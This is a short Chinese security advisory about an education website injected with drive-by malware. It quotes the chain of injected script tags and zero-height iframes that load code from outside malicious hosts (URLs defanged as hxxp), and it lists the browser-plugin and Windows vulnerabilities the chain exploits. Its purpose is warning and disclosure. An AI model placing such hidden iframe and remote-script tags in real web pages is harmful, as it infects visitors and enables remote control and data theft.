東南教育網(hxxp://www.dnjyw.cn/)被黑客植入病毒,用戶如果訪問該網頁,系統就會自動從惡意網站上下載并運行惡意程序。被感染病毒的用戶系統可能被遠程控制,盜取用戶敏感信息。甚至導致死機。
該網站問題代碼:
<script type="text/javascript" src="/include/js/common.js"></script>
hxxp://www.dnjyw.cn/include/js/common.js問題框架代碼:
<SCRIPT language="JScript.Encode" src=hxxp://www.yiwucnc.com/member/css/js/js.js></script>
hxxp://www.yiwucnc.com/member/css/js/js.js問題框架代碼:
<iframe src="hxxp://kdx.sxd65.cn/1/09/index.htm?08" width=100 height=0></Iframe>
hxxp://kdx.sxd65.cn/1/09/index.htm問題框架代碼
<iframe src=index2.htm width=100 height=0></Iframe>
hxxp://kdx.sxd65.cn/1/09/index2.htm問題框架代碼
<script src="js.css"></script>
hxxp://kdx.sxd65.cn/1/09/js.css問題框架代碼
該掛馬網頁通過以下幾個漏洞進行傳播:
ActiveX控件漏洞
MS06-014漏洞
Adobe Flash Player SWF文件漏洞
Qvod Player漏洞
MS09-002漏洞
MS08-041漏洞
暴風影音2 mps.dll組件多個緩沖區溢出漏洞
Real Networks RealPlayer 'rmoc3260.dll' ActiveX控件內存破壞漏洞
RealPlayer播放器IERPCtl.IERPCtl.1漏洞
【注:基于安全考慮,所有網絡鏈接“http”均已被替換為“hxxp”,特此說明。】
